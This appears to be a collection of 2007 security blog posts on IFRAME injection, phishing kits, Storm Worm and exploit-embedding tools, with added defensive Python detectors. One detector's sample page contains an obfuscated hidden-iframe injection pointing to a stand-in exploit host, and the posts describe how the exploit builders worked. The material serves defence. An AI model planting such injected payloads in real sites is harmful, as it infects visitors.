Is this obfuscated IFRAME-ing a fad or a trend? I think it's a trend, since IFRAME-ing to a secondary domain that takes advantage of popular web malware exploitation techniques is already rated as suspicious by security vendors, and Google itself warns you that "this site may harm your computer", so the attackers have to buy themselves time. Moreover, such obfuscations make it harder to assess how many sites, and which ones exactly, were victims of the attack in an OSINT manner. It gets even more interesting: the IP hosting verymonkey.com was historically used to host the banksoffscotland.co.uk scam web site in March this year. In case you wonder, it's not the RBN that's behind this malware embedded attack, but let's say it's a subsidiary of the RBN.
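A site owner's integrity check for the situation described above, as an added example that is not part of the original post: it lists every IFRAME on a page, including ones that only appear after decoding a script-written string. The post does not say which obfuscation was used, so the `unescape()` percent-encoding, the host names and the sample page are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Assumption: the injected script hides its markup as a percent-encoded string
# passed to JavaScript's unescape(); the post does not name the scheme used.
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True for frames sized 0 or 1 pixel, or hidden through inline CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = any(attrs.get(k, "").strip() in ("0", "1") for k in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_iframes(html, site_host, depth=0, max_depth=3):
    """Return one finding per iframe, decoding unescape() layers recursively."""
    collector = IframeCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs in collector.frames:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        findings.append({"src": src, "host": host,
                         "hidden": is_hidden(attrs),
                         "obfuscated": depth > 0,   # only visible after decoding
                         "external": bool(host) and host != site_host})
    if depth < max_depth:
        for match in UNESCAPE_RE.finditer(html):
            findings += find_iframes(unquote(match.group(2)), site_host,
                                     depth + 1, max_depth)
    return findings


def suspicious(findings):
    """External frames that are hidden or were only found after decoding."""
    return [f for f in findings
            if f["external"] and (f["hidden"] or f["obfuscated"])]


# Constructed sample page: one ordinary same-site frame and one injected script.
SAMPLE_PAGE = """<html><body>
<h1>Visa information</h1>
<iframe src="/calendar.html" width="400" height="300"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//exploit-host.example/landing/index.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C/iframe%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in suspicious(find_iframes(SAMPLE_PAGE, "consulate.example")):
        print(finding)
```

Run against a known-good copy of each page as well, so that a newly appearing external host stands out even when the frame is not hidden.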

Wednesday, September 12, 2007

209 Host Locked

Ever come across this fake error message? A "209 Host Locked" message on a fraudulent domain is the default indication that you're on a Rock Phish domain, that is, a single domain hosting multiple phishing campaigns aimed at different financial institutions. And as more Royal Bank of Scotland phishing emails are circulating in the wild, these very same emails pointed me to a Chinese Rock Phish campaign which was shut down as of yesterday. What is different in this campaign, compared to the previous one? The phishers put more effort into ensuring the phishing email gets through spam filters by using spacing, adding _ in front of random words, as well as the usual garbage content at the end of the email. All the URLs within the campaign are already in the Phishtank. DSLreports.com's wisdom of the anti-phishers crowd continues exposing Rock Phish domains on a daily basis, an effort worth keeping track of.

The Rock Phish Kit is the logical evolution from DIY phishing kits like the one I've already blogged about, however, both concepts are not mutually exclusive but apparently tend to work together. The DIY phishing kits on their part are largely used in the planning stage of the phishing campaign, that is, fake sites get generated and the data obtained forwarded to a single place, which is where Rock Phish starts getting used, namely, in the execution stage, where all the phishing pages generated get hosted on a single domain. Phishing efficiency vs Rock Phish's weakness due to centralization of numerous campaigns on a single domain - it's the phishers' trade-off. Within the phishing ecosystem, there are numerous approaches phishers tend to use to achieve maximum efficiency, ones I've already discussed in a previous post. The most prolific problem to me remains phishing 1.0's "push" model that is still remarkably successful compared to the more advanced man in the middle phishing attacks and pharming. From my perspective, if a financial institution really wants to protect its customers from phishing scams, it would first segment the threat, evaluate its customers' perception of it and current level of awareness, and then start an educational campaign aiming not to teach them how to recognize whether a site is a phish or not, but how to report and ignore the "push" model emails that arrive in their mailboxes. From another rather pragmatic perspective, phishers don't just load images for their phish emails from the company's website, but also the majority of phishing emails redirect to the real web site after the data was submitted - an early warning system by itself.
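The early warning mentioned in the last sentence can be read straight out of the institution's own web server logs. The following is an added example, not part of the original post: it groups requests by foreign Referer and reports hosts whose pages pull the site's images and then hand visitors over to it. The host names, allow-list and log lines are constructed, and the "combined" log format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Apache/nginx "combined" access log format (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Assumptions: the institution's own hosts, referrers it expects, asset types.
OWN_HOSTS = {"bank.example", "www.bank.example"}
EXPECTED_REFERERS = {"search.example"}
ASSET_SUFFIXES = (".gif", ".jpg", ".png", ".css", ".ico")


def phishing_referers(lines):
    """Report foreign referrer hosts that load our images from their pages."""
    stats = defaultdict(lambda: {"assets": 0, "landings": 0,
                                 "clients": set(), "first_seen": None})
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        host = urlparse(m["referer"]).hostname
        if host is None or host in OWN_HOSTS or host in EXPECTED_REFERERS:
            continue
        entry = stats[host]
        path = m["path"].split("?", 1)[0].lower()
        if path.endswith(ASSET_SUFFIXES):
            entry["assets"] += 1       # image or stylesheet borrowed by the page
        else:
            entry["landings"] += 1     # visitor sent on to the real site
        entry["clients"].add(m["ip"])
        entry["first_seen"] = entry["first_seen"] or m["ts"]
    report = []
    for host, e in stats.items():
        if e["assets"] == 0:
            continue                   # plain inbound link, nothing borrowed
        report.append({"referer_host": host, "asset_hits": e["assets"],
                       "landing_hits": e["landings"],
                       "clients": len(e["clients"]),
                       "first_seen": e["first_seen"],
                       "redirects_victims": e["landings"] > 0})
    return sorted(report, key=lambda r: (-r["clients"], r["referer_host"]))


# Constructed log lines; bank-example-login.test plays the phishing page.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2007:10:01:02 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "http://bank-example-login.test/rbs/index.html" "Mozilla/4.0"',
    '198.51.100.7 - - [12/Sep/2007:10:01:40 +0000] "GET / HTTP/1.1" 200 9120 "http://bank-example-login.test/rbs/index.html" "Mozilla/4.0"',
    '203.0.113.20 - - [12/Sep/2007:10:05:11 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "http://bank-example-login.test/rbs/index.html" "Mozilla/4.0"',
    '192.0.2.33 - - [12/Sep/2007:10:06:00 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "http://www.bank.example/" "Mozilla/4.0"',
    '192.0.2.34 - - [12/Sep/2007:10:07:00 +0000] "GET / HTTP/1.1" 200 9120 "http://search.example/?q=bank" "Mozilla/4.0"',
    '192.0.2.35 - - [12/Sep/2007:10:08:00 +0000] "GET /rates HTTP/1.1" 200 4000 "http://blog.example/post" "Mozilla/4.0"',
    '192.0.2.36 - - [12/Sep/2007:10:09:00 +0000] "GET / HTTP/1.1" 200 9120 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for row in phishing_referers(SAMPLE_LOG):
        print(row)
```

Image requests triggered from an e-mail client usually carry no Referer at all, so this check sees hosted phishing pages rather than the e-mails themselves.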

Tuesday, September 11, 2007

Storm Worm's DDoS Attitude

Stage one - infect as many end users with high speed Internet access as possible through the use of client side vulnerabilities. Stage two - ensure the longest possible lifecycle for the malware campaign by having the newly released binaries hosted at the infected PCs themselves. Stage three - take advantage of fast-flux networks to make it harder to shut down the entire botnet. And stage four - strike back at any security researcher or vendor playing around with Storm Worm's fast-flux network or somehow messing up with the malicious economies of scale on a worldwide basis. On Friday I received an email from Susan Williams at aa419.org, and it looks like several other anti-fraud sites are getting DDoS-ed too :

"On September 2 2007, online scammers began an automated DDoS attack against aa419.org, with the goal of shutting down the anti-fraud site. For some time, aa419 was able to filter the worldwide botnet's attacks by monitoring connections and only allowing legitimate visitors to access the site. However, by September 5 the hoster was being overwhelmed with nearly 400 GB of incoming requests every hour. Rather than let their infrastructure melt under the onslaught, the server is currently offline. This massive distributed denial of service (DDoS) attack was inspired by aa419.org's mission to blacklist and shut down scam web sites. Since 2004, the all-volunteer organization has recorded more than 18,000 such sites. In addition to publicly warning potential victims of fraud, they work with hosters and registrars to take scam web sites offline quickly, with a success rate of over 97% shut down. Susan Williams, press officer for aa419.org, said, "On the whole, we're positive about this. Not that we enjoy being offline; quite the opposite. But being attacked with a botnet of this magnitude tells us that we are doing serious damage to the organized crime networks that run these scams." Internet crime is increasing at record rates, and aa419.org is at the forefront of the fight against it. "We will continue our work regardless of how many criminals are annoyed by it," Williams said."

Castlecops comments on the DDoS taking place at the site too :

"This newest ddos round started about a week ago and knocked us offline for a couple hours while we figured out what was going on. And we're still under attack, so if the site is a bit slower, you know why. Odd month really, lots of sites, lots of sites, are under ddos. We've got over 10k bots attacking us with more being added daily."

As a friend recently pointed out - you ain't making a difference until you start getting DDoS-ed.

Cartoon courtesy of Joyoftech.com, here're more courtesy of myself.

Related posts:
The War against botnets and DDoS attacks
Emerging DDoS Attack Trends
DDoS On Demand vs DDoS Extortion

Monday, September 10, 2007

Google Hacking for MPacks, Zunkers and WebAttackers

If wannabe botnet masters really wanted to hide their activities online, they would have blocked Google's crawlers from indexing their default malware kit installations, and changed the default installation settings to random directory and filename, wouldn't they? Apparently, a default deny:all rule for anyone but the botnet masters doesn't exist as a principle among botnet amateurs, which leaves us with lots of malware campaigns to assess and shut down.

The following are IPs and domain names currently or historically used to host MPack, WebAttacker and Zunker control panels, as well as live exploit URLs within the packs. Some are down, others are still accessible, the rest are publicly cached. If index.php doesn't exist, admin.php or zu.php act as the default admin panel.

I also find it very interesting to see VeriSign publicly admitting to hacking into the hosts behind the malware kits -- the Russian Business Network in this case -- to assess the damages done in the form of the number of infected PCs and with what exactly :

"When VeriSign managed to hack into the RBN computer running the scam, it found accumulated data representing 30,000 such infections. “Every major trojan in the last year links to RBN” says a VeriSign sleuth."

Unethical penetration testing of malicious hosts to assess the damages done by the malware campaign in question wouldn't result in the malware authors striking back with legal complaints; instead, they'll forward some DDoS bandwidth back at the investigating IPs, a consequence I'm sure researchers reading here have experienced before. On the other hand, the RBN themselves are getting more malicious with every new campaign, just consider for instance that Russian Business Network's IPs were behind the Massive Embedded Web Attack in Italy that took place in June, 2007, and the most recent Bank of India breach as well.

Popular Web Malware Exploitation Techniques

Who needs zero day vulnerabilities to achieve a widescale malware infection these days? Obviously, this once-popular prerequisite for successful client side vulnerability exploitation is no longer needed, but how come? Rather simple, and that's the disturbing part - malicious parties stopped falling victim to the common perception that the end user is so fully patched that zero day vulnerabilities are needed to break through his supposedly complex use of security measures. Instead, whether through an event-study or plain simple common sense on their part, they've realized that an unpatched and obfuscated vulnerability is just as dangerous as a zero day, and the results have been evident ever since.

Going through the screenshots of the infected population of a certain malware kit, you can clearly see the diversity of the outdated vulnerabilities used. Multi-browser vulnerabilities are IFRAME-ed all-in-one to achieve the highest possible efficiency rate, as there's a slight chance a visitor will return twice to a site they've managed to embed the malware at. The success of these kits therefore has nothing to do with malicious innovations, but rather with successful tactical warfare against reactive security response. If perimeter defense cannot be breached, it will get either ignored or bypassed, which is precisely why client side vulnerabilities are back in the game at full speed.

Evidence showcasing this KISS (Keep it Simple Stupid) principle :

- IcePack, MPack, WebAttacker, the Nuclear Malware Kit, and pretty much every popular malware kit is taking advantage of outdated vulnerabilities, whether obfuscated or not depends on the pack's version and the malicious party's understanding of the concept

- The Massive Embedded Web Attack in Italy was using MPack's outdated arsenal of obfuscated vulnerabilities and despite that it achieved its objectives and infected thousands of hosts

- The recent Bank of India breach was using a modified version of the popular malware kits mentioned above, in between syndicating the hack with another campaign using a multi-IFRAME-ing technique, again taking advantage of outdated vulnerabilities

- Storm Worm's success is mostly due to the fact that the end user is still living in the "malicious attachment" world, and so outdated vulnerabilities are again successfully used against her

Exploit Prevention Labs's recent stats on common vulnerabilities used as an infection vector can come in very handy in terms of demonstrating the mass use of these malware kits. The bottom line is that their modularity, combined with features and add-ons available either through a purchase or on demand, is an emerging trend by itself, one where you cannot tell whether it's a script kiddie or a sophisticated malicious party you're dealing with. And even if it's the second, the KISS principle has its own ugly applicability in the malware world.

Thursday, September 06, 2007

Infecting Terrorist Suspects with Malware

As we've already seen in the past, cyber jihadists, thus wannabe terrorists, use commercial anti virus, anti spyware and anonymity software. Therefore, if law enforcement starts benchmarking its creations against the most popular anti virus software, and purchasing private malware crypters to obfuscate the binaries, who would security vendors be protecting you from - law enforcement, or Yuri and Andrei, the fictional characters of two botnet masters? The practice is nothing new when it comes to intelligence gathering and the concept of OSINT through malware for instance. What's new is its applicability to law enforcement, which in a combination with bureaucracy could mean a law in a typical Chinese anti-censorship enforcement, that would oblige security vendors in the country to ignore the malware if they want to continue doing business there. Could we perhaps also witness a collective bargaining effort from security vendors not to do this, given the interest of using malware against potential suspects, a largely open topic by itself? Germany floats Trojan for terror suspects :

"Would-be terrorists need only use Ubuntu Linux to avoid the ploy. And even if they stuck with Windows their anti-virus software might detect the malware. Anti-virus firms that accede to law enforcement demands to turn a blind eye to state-sanctioned malware risk undermining trust in their software, as similar experience in the US has shown. Once the malware gets into circulation there's no guarantee it won't be turned against innocent users. The whole concept is loaded with irony. For one thing, German government computers, like those in the UK before them, are currently under targeted Trojan assault."

Targeted mailings to potential terrorists wouldn't work as effectively as embedding IFRAMES within the cyber jihadist communities, and in the future, we may also see anti-terrorist malware kits courtesy of an unknown government that's purchasing or bidding for zero day browser vulnerabilities or anti virus software ones, in order to infect potential terrorists by bypassing their security solutions in place.

Wednesday, September 05, 2007

Examples of Search Engine Spam

Perhaps I should say an example of a 50/50 black hat SEO, as Google's not listing the first, but has already crawled the second: cashhomes.info/content; mydream-condos.info/content. While assessing the first link farm I found out that on average, 263 pages have exactly 6411 outside links in them, 24.3 links per page. Pretty much the same case with the second one. Owning hundreds of domains like these and feeding them with garbage content in between syndicating ads can undermine a search engine's credibility if the black hat SEO operation starts appearing at the top results, and as we've already seen, both black hat SEO and paid keywords advertising can lead to malware embedded sites.

Storm Worm's Fast Flux Networks

Following my previous posts on "Storm Worm Malware Back in the Game" and "Storm Worm's use of Dropped Domains", here are some handy graphs of Storm Worm's use of fast-flux networks generated during the last several hours, acting as great examples of how diverse malware C&C has become.

The Honeynet Project & Research Alliance defines a fast-flux network as :

"Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations."

In Storm Worm's case, we have an example of fast-fluxing dropped domains, and if you research a little further, you'll see that newly infected Storm Worm hosts shown in this particular moment of the fast-flux are already sending out spam.
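The "constantly changing" DNS records in the Honeynet definition can be measured from repeated lookups of the same name. The following is an added example, not part of the original post: it profiles each domain by how many distinct addresses, networks and answer changes it shows across polls. The thresholds, the /16 grouping and the sample observations are assumptions.

```python
from collections import defaultdict
from ipaddress import ip_network

# Assumed thresholds, to be tuned against your own resolver data.
MIN_DISTINCT_IPS = 5
MIN_NETWORKS = 3
MAX_TTL_S = 600


def flux_profile(observations):
    """observations: iterable of (poll_time_s, domain, a_record_ip, ttl_s)."""
    polls = defaultdict(lambda: defaultdict(set))    # domain -> time -> {ip}
    ttls = defaultdict(list)
    for poll_time, domain, ip, ttl in observations:
        polls[domain][poll_time].add(ip)
        ttls[domain].append(ttl)
    profile = {}
    for domain, by_time in polls.items():
        answers = [by_time[t] for t in sorted(by_time)]
        ips = set().union(*answers)
        # IPv4 /16 prefixes as a rough stand-in for "unrelated networks";
        # a real deployment would map addresses to ASNs instead.
        networks = {ip_network(f"{ip}/16", strict=False) for ip in ips}
        changes = sum(1 for prev, cur in zip(answers, answers[1:]) if prev != cur)
        max_ttl = max(ttls[domain])
        profile[domain] = {
            "polls": len(answers),
            "distinct_ips": len(ips),
            "networks": len(networks),
            "answer_changes": changes,
            "max_ttl": max_ttl,
            "fast_flux": (len(ips) >= MIN_DISTINCT_IPS
                          and len(networks) >= MIN_NETWORKS
                          and max_ttl <= MAX_TTL_S
                          and changes > 0),
        }
    return profile


def build_sample():
    """Constructed observations: three polls, five minutes apart, per domain."""
    flux_answers = {
        0:   ["192.0.2.11", "198.51.100.23", "203.0.113.5"],
        300: ["192.0.2.77", "198.51.100.140", "203.0.113.66"],
        600: ["192.0.2.200", "198.51.100.9", "203.0.113.5"],
    }
    rows = [(t, "flux.example", ip, 180)
            for t, ips in flux_answers.items() for ip in ips]
    rows += [(t, "stable.example", "192.0.2.10", 86400) for t in (0, 300, 600)]
    return rows


if __name__ == "__main__":
    for domain, stats in flux_profile(build_sample()).items():
        print(domain, stats)
```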

Tuesday, September 04, 2007

Login Details for Foreign Embassies in the Wild

Login details for international embassies have been in the wild since August 30th in a full disclosure style :

"Here is a list with working passwords to exactly 100 email-accounts to Embassies and Governments around the world. Yes it’s the real deal and still working when we are posting this. So why in the world would anyone publish this kind of information? Because seriously, I’m not going to call the president of Iran and tell him that I got access to all their embassies. I’m DEranged, not suicidal! He has bombs and stuff…"

The researcher's main motivation behind releasing these is that there's no point in contacting the email owners directly as no one would take his emails seriously enough and change them, so by going full disclosure it would prompt the embassies in question to change the passwords. Dan Egerstad may be quite right, at least on the passwords changing issue. Could these email accounts be accessed globally and if yes why? For instance, could Uzbekistan's embassy in London successfully login into Uzbekistan's embassy in Moscow, and even worse, could a host not belonging to the embassy's network access these mailboxes for flexibility? If yes, there're way too many ways this data could have been obtained. While going through the accounting data, we could both confirm that best practices for strong passwords are in place at some embassies, and also question the lack of such best practices at certain ones, a security measure that works against brute forcing attempts, but is totally irrelevant when it comes to keylogging and sniffing.

Many people would logically consider the possibility of abusing these login details by obtaining the content of the mailboxes. However, another perspective worth keeping in mind is the use of this login data as the foundation for targeted attacks on an embassy-to-embassy basis, the way we've seen it happen before.

DIY Exploits Embedding Tools - a Retrospective

Great analysis by the Spywareguide folks -- Chris Boyd and Peter Jayaraj in this assessment -- especially my deja vu moment with the King's IE Exploiter tool which I intended to cover in an upcoming post, in a combination with a brief retrospective of exploit and malware embedding tools that were empowering entire generations of script kiddies during the last couple of years. These tools are a great example of what the DIY trend used to look like before malicious economies of scale were embraced in the form of today's modular and efficiency-centered malware kits we're aware of.

-- The IE Exploiter v1.0/2.0

The tool is first known to have emerged back in 2002, with its latest version released in 2004. It was first branded as the "Fearless IE Exploiter" and then returned back to its original name. Description of the v1.0 : "Fearless IE Exploiter allows you to embed executable files into HTML documents, that when viewed in an unpatched version of Internet Explorer 5.* will automatically download and execute the .exe". And the description of v2.0 : "IE Exploiter v2 is a very simple tool that creates a HTML file with an embedded executable file. Once the HTML file is viewed the executable file will overwrite notepad.exe on the target system and then execute it using the view-source: prefix."

Result: 22/32 (68.75%)
File size: 149359 bytes
MD5: 315cd35aa5a0334697832e83fac7b0dc
SHA1: 71a7929f7781d969a63e532cd8cd877940a2ca12

-- King's IE Exploiter

King's IE Exploiter is an Arabic DIY exploit embedding tool released around 2004. Although the malware embedded sites it generates on-the-fly come totally unobfuscated, the eventual release of such a feature remains to be seen.

Result: 6/32 (18.75%)
File size: 253440 bytes
MD5: e6052d3abf95429fd761feef0a695470
SHA1: 9f91e21bf9e8898a09c36b31bb1f5afff3cb8f35

-- Zephyrus

Again released around 2004, the description reads : "Its a prove of concept tool to generate a Stench MediaPlayer Exploit file more infos about stench can be found here http://malware.com or at here AVP calls it exploit.win32.zephyrus"

Result: 30/32 (93.75%)

-- God's Will

The description reads : "A GODMESSAGE page is an HTML page that works with an ACTIVEX bug founded in IE5.5/OUTLOOK/OUTLOOK EXPRESS. Thanks to this bug when someone view our godmessaged page he downloads an HTA file in his STARTUP FOLDER."

Result: 32/32 (100%)

-- Ed Html Infector

The description of the tool circa 2004 reads : "Ed HTML Infector is a very simple tool that creates HTML file with an embedded executable file within."

Result: 14/32 (43.75%)
File size: 118784 bytes
MD5: 94c642903318f89d410c64d46f2047aa
SHA1: b834cd34283e541dccb5aad81fb49ca97adbb48c